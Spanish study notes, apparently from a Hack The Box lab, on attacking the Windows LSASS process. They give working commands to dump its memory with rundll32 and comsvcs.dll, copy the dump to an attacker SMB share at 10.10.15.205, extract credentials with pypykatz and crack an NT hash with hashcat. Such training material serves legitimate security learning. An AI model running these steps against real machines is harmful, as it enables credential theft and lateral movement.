🔑Atacando a LSASS

Además de extraer y descifrar hashes desde la base de datos SAM, también podemos dirigirnos al proceso LSASS (Local Security Authority Subsystem Service) 🧩.
LSASS es crítico en Windows porque:

Esto lo convierte en un objetivo muy valioso durante un ataque.


🗂️ Volcado de memoria de LSASS

Antes de extraer credenciales necesitamos un dump de memoria. Esto nos permite trabajar offline con más flexibilidad.

🔹 Método con Administrador de tareas (GUI)

  1. Abrir Task Manager.

  2. Buscar lsass.exe.

  3. Click derecho → Crear archivo de volcado.

  4. Se guarda en %temp%\lsass.dmp.

{F79C40AD-7891-4ED4-9BB7-035CF2F663F9}.png

🔹 Método con Rundll32 + comsvcs.dll (CLI)

Más rápido y sin GUI, pero ⚠️ muchos AV lo detectan como malicioso.

  1. Encontrar el PID de LSASS:

    • En cmd:

      tasklist /svc | findstr lsass.exe
      
    • En PowerShell:

      Get-Process lsass
      

      {A9034675-3BE1-4B6F-BD3C-E266AE7C9528} 1.png

  2. Crear dump:

    rundll32 C:\windows\system32\comsvcs.dll, MiniDump <PID> C:\lsass.dmp full
    

    {07CB84D5-BB38-4908-9783-681AB01CD346}.png
    Luego transferimos lsass.dmp al host de ataque 📤, por ejemplo creando un recurso en Samba:

sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData "/home/kali/Desktop/Apuntes/Academia\ HackTheBox/Password/Windows"

Mover archivos desde Windows:

move C:\Users\htb-student\Desktop\lsass.dmp \\10.10.15.205\CompData\lsass.dmp

🐍 Extrayendo credenciales con Pypykatz

Es como mimikatz pero escrito en Python, lo que nos permite ejecutarlo en Kali Linux:

pypykatz lsa minidump /home/peter/Documents/lsass.dmp 

Esto analiza la memoria de LSASS y nos devuelve credenciales en uso durante sesiones activas.

Lo que puede aparecer:

Ejemplo de la salida:
{A7AD1F2E-4FC0-4DC2-B616-E82B9AAD4C2D}.png


Hash NT extraído:

64f12cddaa88057e06a81b54e73b949b
SHA1: cba4e545b7ec918129725154b29f055e4cd5aea8

Podemos usar Hashcat para crackear el hash NT:

hashcat -m 1000 hash.txt  /usr/share/wordlists/rockyou.txt

Ejemplo
Pasted image 20250823114544.png


🗝️ LSA Secrets y DPAPI